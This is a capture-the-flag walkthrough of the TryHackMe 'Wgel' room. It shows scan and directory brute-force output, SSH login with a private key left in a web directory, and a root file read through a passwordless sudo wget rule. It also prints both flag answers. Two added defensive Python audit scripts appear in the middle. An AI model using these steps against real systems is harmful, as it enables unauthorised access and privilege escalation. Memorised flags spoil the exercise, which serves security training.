Tryhackme - Wgel CTF


In this walk through, we will be going through the Wgel CTF room from Tryhackme. This room is rated as Easy on the platform and is developed to test our enumeration, exploitation and privilege escalation skills. So, let’s get started without any delay.

Wgel CTF

Machine Info:

Title: Wgel
IP address: 10.10.173.195
Difficulty: Easy
Objective: Can you exfiltrate the root flag?

Enumeration:

  • Checking whether the machine is live.

pinging the target

  • Starting with our regular nmap scan. Found two ports open, 22 and 80 (SSH and HTTP); port 53 shows as filtered.

wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.173.195
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2023-04-18 22:11 IST
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.173.195, 16) => Operation not permitted
Offending packet: TCP 10.18.11.103:59811 > 10.10.173.195:53 S ttl=37 id=34865 iplen=44  seq=428394123 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.173.195, 16) => Operation not permitted
Offending packet: TCP 10.18.11.103:59812 > 10.10.173.195:53 S ttl=48 id=26178 iplen=44  seq=428459658 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.173.195, 16) => Operation not permitted
Offending packet: TCP 10.18.11.103:59813 > 10.10.173.195:53 S ttl=48 id=27998 iplen=44  seq=428525193 win=1024 <mss 1460>
Nmap scan report for 10.10.173.195
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.73 seconds

nmap scan

  • Port 80 serves the default Apache page. Nothing fancy. Next, while going through the page's source code, I found a potential username, Jessie, in an HTML comment.

HTML source code comments

  • Firing up gobuster reveals a directory called sitemap. In there we found a website running.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.173.195/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.173.195/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/04/18 22:13:47 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 11374]
/server-status        (Status: 403) [Size: 278]  
/sitemap              (Status: 301) [Size: 316] [--> http://10.10.173.195/sitemap/]
                                                                                   
===============================================================
2023/04/18 22:15:40 Finished
===============================================================

gobuster scan

Home Page

  • Nothing juicy in the default template. Fired up gobuster again against /sitemap and found a directory called .ssh. In there, we found a private key (id_rsa).

wh1terose@fsociety:~$ gobuster dir -u http://10.10.173.195/sitemap -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.173.195/sitemap
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/04/18 22:19:10 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.ssh                 (Status: 301) [Size: 321] [--> http://10.10.173.195/sitemap/.ssh/]
/css                  (Status: 301) [Size: 320] [--> http://10.10.173.195/sitemap/css/] 
/fonts                (Status: 301) [Size: 322] [--> http://10.10.173.195/sitemap/fonts/]
/images               (Status: 301) [Size: 323] [--> http://10.10.173.195/sitemap/images/]
/index.html           (Status: 200) [Size: 21080]                                         
/js                   (Status: 301) [Size: 319] [--> http://10.10.173.195/sitemap/js/]    
                                                                                          
===============================================================
2023/04/18 22:21:01 Finished
===============================================================

gobuster scan

.ssh

id_rsa
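As an added example that is not part of the original write-up, the following Python script audits a web document root for exactly the misconfiguration found here: a .ssh directory and a PEM private key reachable over HTTP. It works on an in-memory mapping of web-relative paths to file heads so the check runs offline; the sample mapping mirrors the room's layout with constructed placeholder contents, and scan_webroot() builds the same mapping from a real directory.

```python
"""Audit a web root for exposed .ssh directories and private keys.
Added example for this write-up, not part of the room or the post."""
import os
import re
from typing import Dict, List

# PEM headers as written by ssh-keygen / OpenSSL.
PRIVATE_KEY_HEADER = re.compile(
    rb"-----BEGIN (OPENSSH|RSA|DSA|EC|ENCRYPTED)? ?PRIVATE KEY-----")

def is_private_key(head: bytes) -> bool:
    """True if the first bytes of a file look like a PEM private key."""
    return PRIVATE_KEY_HEADER.search(head[:256]) is not None

def find_exposed_keys(files: Dict[str, bytes]) -> List[str]:
    """files maps web-relative path -> first bytes. Returns sorted paths
    that sit inside a .ssh directory or carry a private-key header."""
    findings = []
    for rel_path, head in files.items():
        in_ssh_dir = ".ssh" in rel_path.split("/")[:-1]
        if in_ssh_dir or is_private_key(head):
            findings.append(rel_path)
    return sorted(findings)

def scan_webroot(webroot: str) -> List[str]:
    """Build the mapping from disk (first 256 bytes per file) and audit it."""
    files = {}
    for dirpath, _dirs, names in os.walk(webroot):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, webroot).replace(os.sep, "/")
            try:
                with open(full, "rb") as fh:
                    files[rel] = fh.read(256)
            except OSError:
                continue
    return find_exposed_keys(files)

# Constructed sample mirroring the room's layout; key bodies are placeholders.
SAMPLE_WEBROOT = {
    "index.html": b"<html><!-- constructed comment naming Jessie --></html>",
    "sitemap/index.html": b"<html>...</html>",
    "sitemap/css/style.css": b"body { margin: 0 }",
    "sitemap/.ssh/id_rsa": b"-----BEGIN RSA PRIVATE KEY-----\nPLACEHOLDER\n",
    "uploads/notes.txt": b"-----BEGIN OPENSSH PRIVATE KEY-----\nPLACEHOLDER\n",
}
if __name__ == "__main__":
    for path in find_exposed_keys(SAMPLE_WEBROOT):
        print("exposed:", path)
```

Run it as scan_webroot("/var/www/html") on a real host to list anything under the document root that should never have been published.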

Exploitation:

  • Changing the permissions of the private key and using the username mentioned in the home page's source code, we have our way in.

chmod 600 id_rsa
ssh -i id_rsa jessie@10.10.173.195

ssh login

user flag

Privilege Escalation:

  • Checked for any sudo misconfiguration we can exploit. Found that the wget binary can be run with sudo as root and does not require a password.

jessie@CorpOne:/$ sudo -l
Matching Defaults entries for jessie on CorpOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

sudo -l
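As an added example, not code from the room or the original post, this Python script parses sudo -l output such as the listing above and flags grants that hand out file read/write or shell capability as root, especially NOPASSWD ones like the wget rule here. The binary set is a small hand-picked subset of GTFOBins entries, an assumption for illustration rather than the full list.

```python
"""Flag risky grants in `sudo -l` output (added example, not from the room).
The binary set is a small hand-picked subset of GTFOBins, not the full list."""
import re
from typing import List, NamedTuple

# Binaries that read/write arbitrary files or spawn a shell when run as root.
RISKY_BINARIES = {"wget", "curl", "vim", "vi", "less", "more", "find", "tar",
                  "awk", "python", "python3", "bash", "sh", "cp"}
# "(runas) TAG: cmd, cmd" with zero or more TAG: tokens such as NOPASSWD:.
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

class Finding(NamedTuple):
    runas: str
    nopasswd: bool
    command: str
    reason: str

def parse_sudo_l(output: str) -> List[Finding]:
    """Return one Finding per risky command listed after the 'may run' header."""
    findings, in_rules = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",") if c.strip()):
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                reason = "unrestricted sudo"
            elif binary in RISKY_BINARIES:
                reason = f"{binary} can read/write files or spawn a shell as {runas}"
            else:
                continue
            if nopasswd:
                reason += " without a password"
            findings.append(Finding(runas, nopasswd, cmd, reason))
    return findings

# Constructed sample: the listing jessie saw in this room (see above).
SAMPLE_OUTPUT = """\
User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
"""
```

Feed it the output of sudo -l from a host under review, or loop it over sudoers listings collected by a configuration audit, and treat every NOPASSWD finding as a privilege escalation path to remove.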

  • Used GTFOBins to leverage the privilege escalation vector: wget run as root will happily open any file it is told to treat as input.

GTFObins File read

  • Got the root flag in wget's error output: with $LFILE pointing at the target file, sudo wget -i reads it as a list of URLs and echoes its contents while failing to resolve each line as a host name.

jessie@CorpOne:/tmp$ sudo /usr/bin/wget -i $LFILE
--2023-04-18 20:06:11--  http://b1b968b37519ad1daa6408188649263d/
Resolving b1b968b37519ad1daa6408188649263d (b1b968b37519ad1daa6408188649263d)... failed: Name or service not known.
wget: unable to resolve host address ‘b1b968b37519ad1daa6408188649263d’

root flag

Task 1 – Wgel CTF

Question 1 – User flag

057c67131c3d5e42dd5cd3075b198ff6

Question 2 – Root flag

b1b968b37519ad1daa6408188649263d

Task 1 - Wgel CTF


Conclusion:


So that was “Wgel CTF” for you. Let’s sum it up quickly. We started off with a regular nmap scan with version detection and found the common ports open: 22 (SSH) and 80 (HTTP). Next, we enumerated the HTTP web server by brute-forcing directories recursively with gobuster, found an SSH private key in one of the directories, and got our initial foothold via SSH. For the privilege escalation part, we used the GTFOBins wget file read technique to escalate our privileges and get the root flag. On that note, I will take your leave and will see you in the next one. Till then, “Hack the Planet”.
